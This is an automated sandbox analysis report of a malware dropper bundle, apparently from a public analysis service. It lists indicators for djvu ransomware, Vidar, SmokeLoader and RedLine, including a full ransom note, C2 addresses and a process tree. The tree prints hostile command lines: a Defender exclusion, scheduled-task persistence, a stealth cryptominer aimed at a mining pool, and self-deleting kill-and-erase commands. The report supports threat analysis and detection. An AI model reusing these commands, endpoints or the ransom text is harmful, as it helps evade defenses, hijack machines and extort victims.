Resubmissions

23-09-2021 21:08

210923-zyzyaafbfr 10

22-09-2021 10:40

210922-mqyzssehck 10

22-09-2021 05:21

210922-f114ksecck 10

21-09-2021 05:29

210921-f6zspsgdg2 10

20-09-2021 21:51

210920-1qj3jafed9 10

20-09-2021 19:44

210920-yftswafca9 10

20-09-2021 08:28

210920-kczcasgahr 10

20-09-2021 04:42

210920-fb3acafedj 10

20-09-2021 04:42

210920-fb2zksfecr 10

Analysis

  • max time kernel
    1252s
  • max time network
    1806s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    20-09-2021 19:44

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.0MB

  • MD5

    73491325fde5366b31c09da701d07dd6

  • SHA1

    a4e1ada57e590c2df30fc26fad5f3ca57ad922b1

  • SHA256

    56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

  • SHA512

    28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88

Malware Config

Extracted

Path

C:\_readme.txt

Family

djvu

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-vtoEIhR0SI Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0334gSd743d99p8vN1UYnRVfJrLk31VTLd69Ni5b0ex99QMQKt1
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-vtoEIhR0SI

Extracted

Family

vidar

Version

40.7

Botnet

706

C2

https://petrenko96.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

UTS

C2

45.9.20.20:13441

Signatures

  • Detected Djvu ransomware 1 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 30 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 24 IoCs
  • Modifies system certificate store 2 TTPs 23 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 18 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 30 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1944
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1520
      • C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:572
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
              PID:336
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
            4⤵
            • Loads dropped DLL
            PID:664
            • C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\Sun1917b8fb5f09db8.exe
              Sun1917b8fb5f09db8.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1676
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
            4⤵
            • Loads dropped DLL
            PID:820
            • C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\Sun19262b9e49ad.exe
              Sun19262b9e49ad.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Modifies system certificate store
              • Suspicious use of AdjustPrivilegeToken
              PID:1940
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                6⤵
                  PID:1368
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im chrome.exe
                    7⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2676
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
              4⤵
              • Loads dropped DLL
              PID:1808
              • C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\Sun193fda712d9f1.exe
                Sun193fda712d9f1.exe
                5⤵
                • Executes dropped EXE
                PID:1704
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
              4⤵
              • Loads dropped DLL
              PID:1796
              • C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\Sun19e4ade31b2a.exe
                Sun19e4ade31b2a.exe
                5⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious use of AdjustPrivilegeToken
                PID:804
                • C:\Users\Admin\AppData\Roaming\1203866.scr
                  "C:\Users\Admin\AppData\Roaming\1203866.scr" /S
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2116
                • C:\Users\Admin\AppData\Roaming\1871149.scr
                  "C:\Users\Admin\AppData\Roaming\1871149.scr" /S
                  6⤵
                  • Executes dropped EXE
                  • Checks BIOS information in registry
                  • Checks whether UAC is enabled
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2544
                • C:\Users\Admin\AppData\Roaming\2731043.scr
                  "C:\Users\Admin\AppData\Roaming\2731043.scr" /S
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2880
                  • C:\Users\Admin\AppData\Roaming\2731043.scr
                    "C:\Users\Admin\AppData\Roaming\2731043.scr"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2776
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 700
                    7⤵
                    • Loads dropped DLL
                    • Program crash
                    • Suspicious behavior: GetForegroundWindowSpam
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2792
                • C:\Users\Admin\AppData\Roaming\7423177.scr
                  "C:\Users\Admin\AppData\Roaming\7423177.scr" /S
                  6⤵
                  • Executes dropped EXE
                  • Checks BIOS information in registry
                  • Checks whether UAC is enabled
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:3064
                • C:\Users\Admin\AppData\Roaming\4624100.scr
                  "C:\Users\Admin\AppData\Roaming\4624100.scr" /S
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2364
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
              4⤵
              • Loads dropped DLL
              PID:1764
              • C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\Sun1908b94df837b3158.exe
                Sun1908b94df837b3158.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                PID:1708
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
              4⤵
              • Loads dropped DLL
              PID:1756
              • C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\Sun19de8ff4b6aefeb8.exe
                Sun19de8ff4b6aefeb8.exe /mixone
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1608
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun19de8ff4b6aefeb8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\Sun19de8ff4b6aefeb8.exe" & exit
                  6⤵
                    PID:2252
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im "Sun19de8ff4b6aefeb8.exe" /f
                      7⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2300
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
                4⤵
                • Loads dropped DLL
                PID:1632
                • C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\Sun191101c1aaa.exe
                  Sun191101c1aaa.exe
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1528
                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:2080
                    • C:\Users\Admin\AppData\Local\Temp\2.exe
                      "C:\Users\Admin\AppData\Local\Temp\2.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2384
                    • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                      "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2348
                      • C:\ProgramData\6027943.exe
                        "C:\ProgramData\6027943.exe"
                        8⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3052
                      • C:\ProgramData\1873355.exe
                        "C:\ProgramData\1873355.exe"
                        8⤵
                          PID:1068
                        • C:\ProgramData\4994992.exe
                          "C:\ProgramData\4994992.exe"
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2164
                          • C:\ProgramData\4994992.exe
                            "C:\ProgramData\4994992.exe"
                            9⤵
                              PID:2112
                            • C:\ProgramData\4994992.exe
                              "C:\ProgramData\4994992.exe"
                              9⤵
                                PID:432
                              • C:\ProgramData\4994992.exe
                                "C:\ProgramData\4994992.exe"
                                9⤵
                                • Executes dropped EXE
                                PID:2468
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2164 -s 728
                                9⤵
                                • Program crash
                                • Suspicious behavior: GetForegroundWindowSpam
                                PID:2108
                            • C:\ProgramData\4495404.exe
                              "C:\ProgramData\4495404.exe"
                              8⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:3324
                            • C:\ProgramData\8284184.exe
                              "C:\ProgramData\8284184.exe"
                              8⤵
                              • Executes dropped EXE
                              • Modifies system certificate store
                              PID:3728
                          • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                            "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:2312
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                              8⤵
                                PID:1692
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                  9⤵
                                  • Creates scheduled task(s)
                                  PID:2028
                              • C:\Users\Admin\AppData\Roaming\services64.exe
                                "C:\Users\Admin\AppData\Roaming\services64.exe"
                                8⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:756
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                  9⤵
                                    PID:2340
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                      10⤵
                                      • Creates scheduled task(s)
                                      PID:2016
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                    9⤵
                                    • Executes dropped EXE
                                    PID:2444
                                  • C:\Windows\explorer.exe
                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                    9⤵
                                      PID:3864
                                • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:2448
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
                                    8⤵
                                      PID:2972
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /im "setup.exe" /f
                                        9⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3044
                                  • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                    "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2636
                                  • C:\Users\Admin\AppData\Local\Temp\5.exe
                                    "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2700
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 2700 -s 1404
                                      8⤵
                                      • Program crash
                                      • Suspicious behavior: GetForegroundWindowSpam
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2292
                                  • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
                                    "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:2812
                                  • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:3232
                                    • C:\Users\Admin\AppData\Local\Temp\is-S9LH5.tmp\setup_2.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-S9LH5.tmp\setup_2.tmp" /SL5="$20264,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:3492
                                      • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                        9⤵
                                        • Executes dropped EXE
                                        PID:3620
                                        • C:\Users\Admin\AppData\Local\Temp\is-EB6MB.tmp\setup_2.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-EB6MB.tmp\setup_2.tmp" /SL5="$20242,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                          10⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: GetForegroundWindowSpam
                                          PID:3848
                                  • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:3340
                                    • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                      "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                      8⤵
                                      • Executes dropped EXE
                                      PID:3576
                                  • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:3436
                                  • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                    "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:3532
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
                              4⤵
                              • Loads dropped DLL
                              PID:1932
                              • C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\Sun1905815e51282417.exe
                                Sun1905815e51282417.exe
                                5⤵
                                • Executes dropped EXE
                                PID:1916
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
                              4⤵
                              • Loads dropped DLL
                              PID:1572
                              • C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\Sun195a1614ec24e6a.exe
                                Sun195a1614ec24e6a.exe
                                5⤵
                                • Executes dropped EXE
                                PID:1056
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
                              4⤵
                              • Loads dropped DLL
                              PID:1988
                              • C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\Sun1966fb31dd5a07.exe
                                Sun1966fb31dd5a07.exe
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:1816
                                • C:\Users\Admin\AppData\Local\Temp\is-PFDCS.tmp\Sun1966fb31dd5a07.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-PFDCS.tmp\Sun1966fb31dd5a07.tmp" /SL5="$10166,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS0F5D4F91\Sun1966fb31dd5a07.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:1128
                                  • C:\Users\Admin\AppData\Local\Temp\is-GB32Q.tmp\Ze2ro.exe
                                    "C:\Users\Admin\AppData\Local\Temp\is-GB32Q.tmp\Ze2ro.exe" /S /UID=burnerch2
                                    7⤵
                                    • Drops file in Drivers directory
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Drops file in Program Files directory
                                    PID:2068
                                    • C:\Program Files\Windows NT\ZEWMQELYJG\ultramediaburner.exe
                                      "C:\Program Files\Windows NT\ZEWMQELYJG\ultramediaburner.exe" /VERYSILENT
                                      8⤵
                                      • Executes dropped EXE
                                      PID:3288
                                      • C:\Users\Admin\AppData\Local\Temp\is-HV66C.tmp\ultramediaburner.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-HV66C.tmp\ultramediaburner.tmp" /SL5="$601AC,281924,62464,C:\Program Files\Windows NT\ZEWMQELYJG\ultramediaburner.exe" /VERYSILENT
                                        9⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Drops file in Program Files directory
                                        • Suspicious use of FindShellTrayWindow
                                        PID:1068
                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                          10⤵
                                          • Executes dropped EXE
                                          PID:3116
                                    • C:\Users\Admin\AppData\Local\Temp\d9-c254d-63e-73f9f-7230804e07034\Vizhepozhimi.exe
                                      "C:\Users\Admin\AppData\Local\Temp\d9-c254d-63e-73f9f-7230804e07034\Vizhepozhimi.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:3388
                                      • C:\Program Files\Internet Explorer\iexplore.exe
                                        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                        9⤵
                                        • Modifies Internet Explorer settings
                                        • Suspicious behavior: GetForegroundWindowSpam
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SetWindowsHookEx
                                        PID:584
                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:584 CREDAT:275457 /prefetch:2
                                          10⤵
                                          • Modifies Internet Explorer settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of SetWindowsHookEx
                                          PID:2312
                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:584 CREDAT:275478 /prefetch:2
                                          10⤵
                                          • Modifies Internet Explorer settings
                                          • Suspicious use of SetWindowsHookEx
                                          PID:3984
                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:584 CREDAT:1520665 /prefetch:2
                                          10⤵
                                          • Modifies Internet Explorer settings
                                          • Suspicious use of SetWindowsHookEx
                                          PID:2608
                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:584 CREDAT:1717281 /prefetch:2
                                          10⤵
                                          • Modifies Internet Explorer settings
                                          • Suspicious use of SetWindowsHookEx
                                          PID:6460
                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:584 CREDAT:1389635 /prefetch:2
                                          10⤵
                                            PID:9088
                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                          9⤵
                                            PID:1748
                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                            "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
                                            9⤵
                                              PID:3700
                                            • C:\Program Files\Internet Explorer\iexplore.exe
                                              "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
                                              9⤵
                                                PID:6436
                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                "C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=2087215
                                                9⤵
                                                  PID:8496
                                                • C:\Program Files\Internet Explorer\iexplore.exe
                                                  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=4263119
                                                  9⤵
                                                    PID:9064
                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:9064 CREDAT:275457 /prefetch:2
                                                      10⤵
                                                        PID:9188
                                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                                      "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=1294231
                                                      9⤵
                                                        PID:8672
                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8672 CREDAT:275457 /prefetch:2
                                                          10⤵
                                                            PID:8572
                                                      • C:\Users\Admin\AppData\Local\Temp\c4-e87a7-137-3a594-e862254b06b71\Bebypegole.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\c4-e87a7-137-3a594-e862254b06b71\Bebypegole.exe"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Modifies system certificate store
                                                        PID:3408
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rovi2afu.4go\GcleanerEU.exe /eufive & exit
                                                          9⤵
                                                          • Blocklisted process makes network request
                                                          PID:1676
                                                          • C:\Users\Admin\AppData\Local\Temp\rovi2afu.4go\GcleanerEU.exe
                                                            C:\Users\Admin\AppData\Local\Temp\rovi2afu.4go\GcleanerEU.exe /eufive
                                                            10⤵
                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                            PID:1084
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\rovi2afu.4go\GcleanerEU.exe" & exit
                                                              11⤵
                                                                PID:3732
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /im "GcleanerEU.exe" /f
                                                                  12⤵
                                                                  • Kills process with taskkill
                                                                  PID:2948
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ccagotyn.chj\installer.exe /qn CAMPAIGN="654" & exit
                                                            9⤵
                                                              PID:2132
                                                              • C:\Users\Admin\AppData\Local\Temp\ccagotyn.chj\installer.exe
                                                                C:\Users\Admin\AppData\Local\Temp\ccagotyn.chj\installer.exe /qn CAMPAIGN="654"
                                                                10⤵
                                                                • Enumerates connected drives
                                                                • Modifies system certificate store
                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:3208
                                                                • C:\Windows\SysWOW64\msiexec.exe
